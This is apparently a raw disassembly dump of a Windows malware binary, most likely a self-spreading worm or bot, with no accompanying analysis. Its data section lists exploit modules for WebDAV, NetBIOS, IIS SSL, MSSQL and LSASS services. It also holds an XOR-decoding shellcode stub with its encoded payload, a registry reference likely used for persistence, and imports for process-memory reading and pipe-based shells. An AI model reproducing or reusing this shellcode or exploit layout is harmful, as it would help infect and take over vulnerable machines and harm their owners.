dd offset sub_417EF8
stru_429040 _msEH <0FFFFFFFFh, 0, offset sub_41910B> ; DATA XREF: sub_419087+2�o
align 10h
stru_429050 _msEH <0FFFFFFFFh, 0, offset sub_41979B> ; DATA XREF: sub_419685+2�o
align 10h
dbl_429060 dq 0.0 ; DATA XREF: sub_41982E+6�r
dword_429068 dd 30302B65h, 30hdbl_429070 dq 1.0 ; DATA XREF: sub_419BCC+2A�r
dbl_429078 dq 4.195835e6 ; DATA XREF: sub_419BCC+F�r
dbl_429080 dq 3.145727e6 ; DATA XREF: sub_419BCC+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_419C0C+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_419C0C�o
align 10h
dword_4290B0 dd 2 dup(0) ; sub_41C5B0+1E�o ...
stru_4290B8 _msEH <0FFFFFFFFh, offset loc_41A102, offset loc_41A106>
; DATA XREF: sub_419E09+2�o
dd 0FFFFFFFFh, 419EFFh, 419F03h, 0FFFFFFFFh, 419FCDh, 419FD1h
dd 0
db 2 dup(0)
word_4290E2 dw 20h ; DATA XREF: sub_41E54C+18�r
; .data:0042D830�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 41h dup(0)
db 2 dup(0)
word_4292EA dw 20h ; DATA XREF: .data:off_42DEA4�o
aHH_0:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_4294F0 _msEH <0FFFFFFFFh, offset sub_41A1E2, offset loc_41A1E6>
; DATA XREF: sub_41A1F6-2F�o
align 10h
stru_429500 _msEH <0FFFFFFFFh, 0, offset sub_41A31E> ; DATA XREF: sub_41A271+2�o
align 10h
dd offset loc_41A2E4
dd offset loc_41A2ED
stru_429518 _msEH <0FFFFFFFFh, offset sub_41A373, offset loc_41A37C>
; DATA XREF: sub_41A33F+2�o
align 8
stru_429528 _msEH <0FFFFFFFFh, 0, offset sub_41A4DE> ; DATA XREF: sub_41A3A1+2�o
align 8
dd offset loc_41A426
dd offset loc_41A469
stru_429540 _msEH <0FFFFFFFFh, offset sub_41A6B8, offset loc_41A6BC>
; DATA XREF: sub_41A548+2�o
align 10h
stru_429550 _msEH <0FFFFFFFFh, offset loc_41AA94, offset loc_41AA98>
; DATA XREF: sub_41AA6F+2�o
align 10h
stru_429560 _msEH <0FFFFFFFFh, offset loc_41AAC1, offset loc_41AAC5>
; DATA XREF: sub_41AAA4+2�o
align 10h
stru_429570 _msEH <0FFFFFFFFh, 0, offset sub_41AE2B> ; DATA XREF: sub_41ADC8+2�o
align 10h
stru_429580 _msEH <0FFFFFFFFh, 0, offset sub_41B114> ; DATA XREF: sub_41AFCD+2�o
align 10h
stru_429590 _msEH <0FFFFFFFFh, 0, offset sub_41B2A8> ; DATA XREF: sub_41B276+2�o
align 10h
stru_4295A0 _msEH <0FFFFFFFFh, offset loc_41B2ED, offset loc_41B2F1>
; DATA XREF: sub_41B2C0+2�o
align 10h
stru_4295B0 _msEH <0FFFFFFFFh, offset loc_41B331, offset loc_41B335>
; DATA XREF: sub_41B304+2�o
align 10h
stru_4295C0 _msEH <0FFFFFFFFh, 0, offset sub_41B440> ; DATA XREF: sub_41B3BC+2�o
dd 746E7572h, 20656D69h, 6F727265h, 2072h, 534F4C54h, 72652053h
dd 0D726F72h, 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_42DFBC�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_41B5C9+12C�o
; sub_41E1C5+134�o
align 10h
asc_4298F0 db 0Ah ; DATA XREF: sub_41B5C9+110�o
; sub_41E1C5+101�o
db 0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_41B5C9+FE�o
db 0Ah
db 'Program: ',0
align 10h
a___ db '...',0 ; DATA XREF: sub_41B5C9+CA�o
; sub_41E1C5+D1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_41B5C9+89�o
; sub_41E1C5+88�o
align 10h
stru_429930 _msEH <0FFFFFFFFh, 0, offset sub_41C164> ; DATA XREF: sub_41C0E0+2�o
align 10h
stru_429940 _msEH <0FFFFFFFFh, 0, offset sub_41C327> ; DATA XREF: sub_41C280+2�o
align 10h
stru_429950 _msEH <0FFFFFFFFh, offset loc_41C689, offset loc_41C68D>
; DATA XREF: sub_41C5B0+2�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:0042E1AC�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: .data:0042E1A8�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:0042E19C�o
align 4
aNovember db 'November',0 ; DATA XREF: .data:0042E198�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:0042E194�o
aSeptember db 'September',0 ; DATA XREF: .data:0042E190�o
align 4
aAugust db 'August',0 ; DATA XREF: .data:0042E18C�o
align 10h
aJuly db 'July',0 ; DATA XREF: .data:0042E188�o
align 4
aJune db 'June',0 ; DATA XREF: .data:0042E184�o
align 10h
aApril db 'April',0 ; DATA XREF: .data:0042E17C�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:0042E178�o
align 10h
aFebruary db 'February',0 ; DATA XREF: .data:0042E174�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:0042E170�o
aDec db 'Dec',0 ; DATA XREF: .data:0042E16C�o
aNov db 'Nov',0 ; DATA XREF: .data:0042E168�o
aOct db 'Oct',0 ; DATA XREF: .data:0042E164�o
aSep db 'Sep',0 ; DATA XREF: .data:0042E160�o
aAug db 'Aug',0 ; DATA XREF: .data:0042E15C�o
aJul db 'Jul',0 ; DATA XREF: .data:0042E158�o
aJun db 'Jun',0 ; DATA XREF: .data:0042E154�o
aMay db 'May',0 ; DATA XREF: .data:0042E150�o
; .data:0042E180�o
aApr db 'Apr',0 ; DATA XREF: .data:0042E14C�o
aMar db 'Mar',0 ; DATA XREF: .data:0042E148�o
aFeb db 'Feb',0 ; DATA XREF: .data:0042E144�o
aJan db 'Jan',0 ; DATA XREF: .data:0042E140�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:0042E13C�o
align 10h
aFriday db 'Friday',0 ; DATA XREF: .data:0042E138�o
align 4
aThursday db 'Thursday',0 ; DATA XREF: .data:0042E134�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:0042E130�o
align 10h
aTuesday db 'Tuesday',0 ; DATA XREF: .data:0042E12C�o
aMonday db 'Monday',0 ; DATA XREF: .data:0042E128�o
align 10h
aSunday db 'Sunday',0 ; DATA XREF: .data:0042E124�o
align 4
aSat db 'Sat',0 ; DATA XREF: .data:0042E120�o
aFri db 'Fri',0 ; DATA XREF: .data:0042E11C�o
aThu db 'Thu',0 ; DATA XREF: .data:0042E118�o
aWed db 'Wed',0 ; DATA XREF: .data:0042E114�o
aTue db 'Tue',0 ; DATA XREF: .data:0042E110�o
aMon db 'Mon',0 ; DATA XREF: .data:0042E10C�o
aSun db 'Sun',0 ; DATA XREF: .data:off_42E108�o
align 8
stru_429A78 _msEH <0FFFFFFFFh, 0, offset sub_41CFDB> ; DATA XREF: sub_41CF3E+2�o
align 8
stru_429A88 _msEH <0FFFFFFFFh, 0, offset sub_41D08C> ; DATA XREF: sub_417FE4+5018�o
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_41D188+2D�o
align 10h
stru_429AC0 _msEH <0FFFFFFFFh, offset loc_41D1E5, offset loc_41D1F3>
; DATA XREF: sub_41D188+2�o
align 10h
stru_429AD0 _msEH <0FFFFFFFFh, 0, offset sub_41D889> ; DATA XREF: sub_41D844+2�o
align 10h
stru_429AE0 _msEH <0FFFFFFFFh, offset loc_41E075, offset loc_41E079>
; DATA XREF: sub_41DFA0+2�o
dword_429AEC dd 676F7250h, 3A6D6172h, 20haABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: sub_41E1C5+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: sub_41E1C5:loc_41E222�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: sub_41E1C5+4F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: sub_41E1C5+4A�o
align 10h
stru_429C90 _msEH <0FFFFFFFFh, offset loc_41E200, offset loc_41E204>
; DATA XREF: sub_41E1C5+5�o
align 10h
stru_429CA0 _msEH <0FFFFFFFFh, 0, offset sub_41E447> ; DATA XREF: sub_41E3DD+2�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_41E453+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_41E453+62�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_41E453+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_41E453+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_41E453+2E�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_41EDA1:loc_41EE90�o
align 4
a1Inf db '1#INF',0 ; DATA XREF: sub_41EDA1+D2�o
align 10h
a1Ind db '1#IND',0 ; DATA XREF: sub_41EDA1+C1�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: sub_41EDA1+A7�o
align 10h
stru_429D70 _msEH <0FFFFFFFFh, 0, offset sub_41F196> ; DATA XREF: sub_41F063+2�o
align 10h
stru_429D80 _msEH <0FFFFFFFFh, offset loc_41F7D0, offset loc_41F7D4>
; DATA XREF: sub_41F6BA+2�o
dd 0FFFFFFFFh, 41F85Dh, 41F861h
stru_429D98 _msEH <0FFFFFFFFh, offset loc_41FA61, offset loc_41FA65>
; DATA XREF: sub_41F96A+2�o
dd 0FFFFFFFFh, 41FAD3h, 41FAD7h, 0
dword_429DB4 dd 2 dup(0) ; sub_41B2C0:loc_41B2D3�o
dword_429DBC dd 0 ; sub_41B304:loc_41B317�o
dd 0FFFFFFFFh, 41FB8Fh
dword_429DC8 dd 19930520h, 1, 429DC0h, 4 dup(0) dd 29E20h, 2 dup(0)
dd 2A5D0h, 20000h, 29FFCh, 2 dup(0)
dd 2A5DEh, 201DCh, 5 dup(0)
dd 7C802442h, 7C80929Ch, 7C910331h, 7C810637h, 7C80B4CFh
dd 7C80C058h, 7C9010EDh, 7C901005h, 7C80B829h, 7C91188Ah
dd 7C80A7D4h, 7C80A427h, 7C82FA46h, 7C81CDDAh, 7C802367h
dd 7C809B47h, 7C810D87h, 7C801A24h, 7C814EEAh, 7C80EDD7h
dd 7C834EB1h, 7C8137D9h, 7C91043Dh, 7C9105D4h, 7C80ABC1h
dd 7C80E7ECh, 7C80E866h, 7C80B9A0h, 7C8021CCh, 7C812D56h
dd 7C8309E1h, 7C80ABDEh, 7C80F0F4h, 7C80ADA0h, 7C801D77h
dd 7C80180Eh, 7C810B8Eh, 7C810A77h, 7C83632Dh, 7C8361EEh
dd 7C81153Ch, 7C80B6A1h, 7C82F7A0h, 7C80FE82h, 7C80FF19h
dd 7C80B974h, 7C80B905h, 7C80945Ch, 7C831CB8h, 7C831C45h
dd 7C8329D9h, 7C812782h, 7C835DCAh, 7C809BF8h, 7C80A0D4h
dd 7C8216A4h, 7C80DDF5h, 7C831EABh, 7C801E16h, 7C80BAA1h
dd 7C81CE03h, 7C835E8Fh, 7C809920h, 7C8286EEh, 7C802520h
dd 7C80E93Fh, 7C81AE17h, 7C85F90Fh, 7C80DDFEh, 7C81E0C7h
dd 7C81B58Bh, 7C80D262h, 7C812ADEh, 7C830B14h, 7C873A31h
dd 7C80A05Dh, 7C8310F2h, 7C832044h, 7C9109EDh, 7C80BCCFh
dd 7C809E01h, 7C84467Dh, 7C809EF1h, 7C812641h, 7C81DC03h
dd 7C80A490h, 7C9179FDh, 7C8017E5h, 7C937A40h, 7C801EEEh
dd 7C812F1Dh, 7C8136D7h, 7C910340h, 7C809728h, 7C809BC5h
dd 7C809740h, 7C812D9Fh, 7C810EF8h, 7C812BB6h, 7C809AE4h
dd 7C809A51h, 7C809E79h, 7C801AD0h, 7C80B9D1h, 7C838DE8h
dd 7C80CCA8h, 7C809915h, 7C8127A7h, 7C812E76h, 7C812F39h
dd 7C862E2Ah, 7C81DF77h, 7C81CF5Bh, 7C814AE7h, 7C812F08h
dd 7C80CC97h, 7C810E51h, 7C838A0Ch, 0
dd 80000015h, 8000000Ah, 80000002h, 8000000Dh, 80000012h
dd 80000097h, 80000001h, 80000010h, 80000013h, 80000073h
dd 80000017h, 8000000Bh, 80000009h, 80000004h, 80000003h
dd 80000074h, 0
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0BEh ; ¾
db 1, 47h, 65h
aTtickcount db 'tTickCount',0
align 4
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 4
aE_0 db 'e',0
aCreatethread db 'CreateThread',0
align 4
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aM_1 db '¬',0
aExitthread db 'ExitThread',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db '‹',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 3
db 2, 49h, 6Eh
aItializecritic db 'itializeCriticalSectionAndSpinCount',0
aV db 'v',0
aDeletecritical db 'DeleteCriticalSection',0
db 5Ch ; \
db 1, 47h, 65h
aTlocaltime db 'tLocalTime',0
align 4
db 7Eh ; ~
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 27Fh
aQueryperform_1 db 'QueryPerformanceFrequency',0
db '«',0
aExitprocess db 'ExitProcess',0
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 2
db ',',0
aClosehandle db 'CloseHandle',0
dd 72570376h, 46657469h, 656C69h, 7243004Ah, 65746165h
dd 656C6946h, 1A60041h
aGetsystemdirec db 'GetSystemDirectoryA',0
db 'Á',0
aFindclose db 'FindClose',0
db 'Î',0
aFindnextfilea db 'FindNextFileA',0
db 'Å',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
dw 1F5h
aHeapfree db 'HeapFree',0
align 2
dw 1EFh
aHeapalloc db 'HeapAlloc',0
dw 18Bh
aGetprocessheap db 'GetProcessHeap',0
align 4
db '¸',0
aFiletimetosyst db 'FileTimeToSystemTime',0
align 10h
db '·',0
aFiletimetoloca db 'FileTimeToLocalFileTime',0
dw 35Eh
aVirtualqueryex db 'VirtualQueryEx',0
align 4
db 93h ; “
db 2, 52h, 65h
aAdprocessmemor db 'adProcessMemory',0
db 0A8h ; ¨
db 1, 47h, 65h
aTsysteminfo db 'tSystemInfo',0
db 61h ; a
db 2, 4Fh, 70h
aEnprocess db 'enProcess',0
db 'å',0
aFreelibrary db 'FreeLibrary',0
db 43h ; C
db 1, 47h, 65h
aTenvironmentva db 'tEnvironmentVariableW',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 90h
db 2, 52h, 65h
aAdfile db 'adFile',0
align 4
db 0F1h ; ñ
db 2, 53h, 65h
aTfilepointer db 'tFilePointer',0
align 2
dw 14Dh
aGetfilesize db 'GetFileSize',0
db 0BFh ; ¿
db 1, 47h, 65h
aTtimeformata db 'tTimeFormatA',0
align 2
dw 133h
aGetdateformata db 'GetDateFormatA',0
align 4
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 167h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
aR_0 db 'à',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 0E9h ; é
db 1, 47h, 6Ch
aObalunlock db 'obalUnlock',0
align 4
db 0E2h ; â
db 1, 47h, 6Ch
aOballock db 'obalLock',0
align 2
dw 345h
aUnmapviewoffil db 'UnmapViewOfFile',0
db 44h ; D
db 2, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
aK_0 db 'K',0
aCreatefilemapp db 'CreateFileMappingA',0
align 2
dw 2F5h
aSetfiletime db 'SetFileTime',0
dd 6547014Fh, 6C694674h, 6D695465h, 0AE0065h
aExpandenvironm db 'ExpandEnvironmentStringsA',0
dw 2EFh
aSetfileattribu db 'SetFileAttributesA',0
align 4
db 0B6h ; ¶
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
db 51h ; Q
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 369h
aWidechartomult db 'WideCharToMultiByte',0
db 1
db 1, 47h, 65h
aTcomputernamea db 'tComputerNameA',0
align 4
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 331h
aTerminateproce db 'TerminateProcess',0
align 2
dw 395h
aLstrcmpia db 'lstrcmpiA',0
dw 332h
aTerminatethrea db 'TerminateThread',0
db 4Ah ; J
db 2, 4Dh, 6Fh
aVefilea db 'veFileA',0
db 30h ; 0
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcessId',0
db ':',0
aCopyfilea db 'CopyFileA',0
dw 365h
aWaitforsingleo db 'WaitForSingleObject',0
aW db 'W',0
aCreatemutexa db 'CreateMutexA',0
align 10h
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
dw 26Ch
aPeeknamedpipe db 'PeekNamedPipe',0
aI_1 db 'ˆ',0
aDuplicatehandl db 'DuplicateHandle',0
db '[',0
aCreatepipe db 'CreatePipe',0
align 2
dw 2C8h
aSetconsolectrl db 'SetConsoleCtrlHandler',0
dw 15Dh
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 10h
db 0C8h ; È
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 61h ; a
db 1, 47h, 65h
aTlogicaldrives db 'tLogicalDrives',0
align 4
db 'ê',0
aGenerateconsol db 'GenerateConsoleCtrlEvent',0
align 10h
db 63h ; c
db 3, 57h, 61h
aItformultipleo db 'itForMultipleObjects',0
align 2
dw 1E3h
aGlobalmemoryst db 'GlobalMemoryStatus',0
align 10h
aKernel32_dll_0 db 'KERNEL32.dll',0
align 2
aWs2_32_dll_0 db 'WS2_32.dll',0
align 2
dw 1F9h
aHeaprealloc db 'HeapReAlloc',0
db 0ACh ; ¬
db 1, 47h, 65h
aTsystemtimeasf db 'tSystemTimeAsFileTime',0
dw 2B1h
aRtlunwind db 'RtlUnwind',0
dw 19Ch
aGetstartupinfo db 'GetStartupInfoA',0
db 0FDh ; ý
align 2
aGetcommandline db 'GetCommandLineA',0
dw 337h
aTlsfree db 'TlsFree',0
db 0FEh ; þ
db 2, 53h, 65h
aTlasterror_0 db 'tLastError',0
align 4
db 32h ; 2
db 1, 47h, 65h
aTcurrentthread db 'tCurrentThreadId',0
align 2
dw 339h
aTlssetvalue db 'TlsSetValue',0
db 38h ; 8
db 3, 54h, 6Ch
aSgetvalue db 'sGetValue',0
dw 336h
aTlsalloc db 'TlsAlloc',0
align 2
dw 1F3h
aHeapdestroy db 'HeapDestroy',0
db 0F1h ; ñ
db 1, 48h, 65h
aApcreate db 'apCreate',0
align 2
dw 358h
aVirtualfree db 'VirtualFree',0
db 55h ; U
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 4
db 14h
db 2, 49h, 73h
aBadwriteptr db 'BadWritePtr',0
db 5Bh ; [
db 3, 56h, 69h
aRtualprotect db 'rtualProtect',0
align 2
dw 35Dh
aVirtualquery db 'VirtualQuery',0
align 2
dw 220h
aLcmapstringa db 'LCMapStringA',0
align 2
dw 221h
aLcmapstringw db 'LCMapStringW',0
align 2
aI_2 db 'ë',0
aGetacp db 'GetACP',0
align 10h
db 7Ch ; |
db 1, 47h, 65h
aToemcp db 'tOEMCP',0
align 4
db 0F1h ; ñ
align 2
aGetcpinfo db 'GetCPInfo',0
db 9Eh ; ž
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 42h ; B
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 4
aU_0 db 'ã',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 13Fh
aGetenvironment db 'GetEnvironmentStrings',0
aF db 'ä',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 41h ; A
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStringsW',0
align 2
dw 2FAh
aSethandlecount db 'SetHandleCount',0
align 4
dd 65470150h, 6C694674h, 70795465h, 19F0065h, 53746547h
dd 6E697274h, 70795467h, 4165h, 654701A2h, 72745374h, 54676E69h
dd 57657079h, 30C0000h, 53746553h, 61486474h, 656C646Eh
dd 0DB0000h, 73756C46h, 6C694668h, 66754265h, 73726566h
dd 2020000h
aInitializecr_0 db 'InitializeCriticalSection',0
dw 31Dh
aSetunhandledex db 'SetUnhandledExceptionFilter',0
dd 73490211h, 52646142h, 50646165h, 7274h, 7349020Eh, 43646142h
dd 5065646Fh, 7274h, 654801FBh, 69537061h, 657Ah, 655302E8h
dd 646E4574h, 6946664Fh, 656Ch
_rdata ends
; Section 3. (virtual address 0002B000)
; Virtual size : 000529B8 ( 338360.)
; Section size in file : 000529B8 ( 338360.)
; Offset to raw data for section: 0002B000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 42B000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_42B000 dd 0 dd offset sub_41E16F
dword_42B008 dd 0 dword_42B00C dd 0 dd offset sub_417F3B
dd offset sub_41B11D
dd offset sub_41B24E
dd offset sub_41E355
dword_42B020 dd 0 dword_42B024 dd 0 dd offset sub_417FE4
dword_42B02C dd 0 dword_42B030 dd 0 ; DATA XREF: sub_415FC0:loc_41604E�o
dd offset sub_41E368
dword_42B038 dd 2 dup(0) aWebdav db 'webdav',0 ; DATA XREF: sub_401967+155�o
align 4
db 2 dup(0)
aWebdav_0 db 'WebDav',0 ; DATA XREF: sub_4127BC+2B2�o
; .text:00412F54�o ...
align 4
dd 5 dup(0)
dword_42B068 dd 50h ; sub_408A18+3E2A�r ...
off_42B06C dd offset sub_4127BC ; DATA XREF: sub_401967+1F8�r
dword_42B070 dd 0 ; sub_4127BC+30E�r ...
dword_42B074 dd 1 dword_42B078 dd 0 aNetbios db 'netbios',0
dd 654E0000h, 6F694274h, 73h, 5 dup(0)
dd 8Bh, 4142E0h, 3 dup(0)
aNtpass db 'ntpass',0
align 10h
dd 544E0000h, 73736150h, 6 dup(0)
dd 1BDh, 4142E0h, 3 dup(0)
aIis5ssl db 'iis5ssl',0
dd 49490000h, 53533553h, 4Ch, 5 dup(0)
dd 1BBh, 412CD0h, 0
dd 1, 0
aMssql db 'mssql',0
align 4
dd 534D0000h, 4C5153h, 6 dup(0)
dd 599h, 413D4Ch, 0
dd 1, 0
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 413505h, 0
dd 2 dup(1), 7361736Ch, 33315F73h, 736C0039h, 5F737361h
dd 393331h, 5 dup(0)
dd 8Bh, 4136D3h, 0
dd 2 dup(1), 0Fh dup(0)
aLsass_445_1 db 'lsass_445',0
byte_42B22A db 1 ; DATA XREF: sub_408A18:loc_40C7BA�r
; sub_408A18+3DAE�o
aLsass_139 db 'lsass_139',0
db 1, 2 dup(0)
dd 4 dup(0)
; ---------------------------------------------------------------------------
loc_42B248: ; DATA XREF: .text:00412DE4�o
jmp short loc_42B25A
; =============== S U B R O U T I N E =======================================
sub_42B24A proc near ; CODE XREF: sub_42B24A:loc_42B25A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 166h
loc_42B252: ; CODE XREF: sub_42B24A+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42B252
jmp short loc_42B25F
; ---------------------------------------------------------------------------
loc_42B25A: ; CODE XREF: .data:loc_42B248�j
call sub_42B24A
loc_42B25F: ; CODE XREF: sub_42B24A+E�j
jo short near ptr dword_42B1DC+1Eh
cwde
cdq
cdq
retn
sub_42B24A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 21h, 95h, 69h
dd 9912E664h, 3485E912h, 1291D912h, 0A5EA1241h, 0EF126A9Ah
dd 126A9AE1h, 629AB9E7h, 0AA8DD712h, 0C8CECF74h, 629AA612h
dd 97F36B12h, 0ED3F6AC0h, 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h
dd 0DF125412h, 485A9ABDh, 0AA589A78h, 9112FF50h, 9A85DF12h
dd 9B78585Ah, 9912589Ah, 63125A9Ah, 5F1A6E12h, 0F3491297h
dd 0E571C09Ah, 1A999999h, 0CFCB945Fh, 0C365CE66h, 9DF34112h
dd 99F071C0h, 0C9C99999h, 98F3C9C9h, 0CE669BF3h, 5E411269h
dd 9E999B9Eh, 1059AA24h, 89F39DDEh, 0CE66CACEh, 0CA98F36Dh
dd 0C961CE66h, 0CE66CAC9h, 0DD751A65h, 42AA6D12h, 10C089F3h
dd 627B1785h, 10A1DF10h, 0DF10A5DFh, 0B5DF5ED9h, 99999898h
dd 0C989DE14h, 0CACACACFh, 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0CAC9A5DEh, 0C97DCE66h, 0AA71CE66h, 591C3559h, 0CBC860ECh
dd 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66676271h, 0EDFCDE66h
dd 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh
dd 0EAFCFAF6h, 0DC99D8EAh, 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh
dd 0D5FDF8F6h, 0F8EBFBF0h, 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh
dd 0F6CAD8CAh, 0EDFCF2FAh, 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h
dd 0FAF899F7h, 0EDE9FCFAh, 99h
dword_42B3C8 dd 80000002h off_42B3CC dd offset aSoftwareMicr_0 ; DATA XREF: sub_40213F+1E�r
; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h, 42BFFCh, 80000001h, 42C034h
dword_42B3E0 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_42B42C dd 3000005h, 10h, 18h, 1, 3 dup(0); ---------------------------------------------------------------------------
loc_42B448: ; DATA XREF: sub_4039C6+10F�o
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dword_42B45C dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_4039C6+138�o
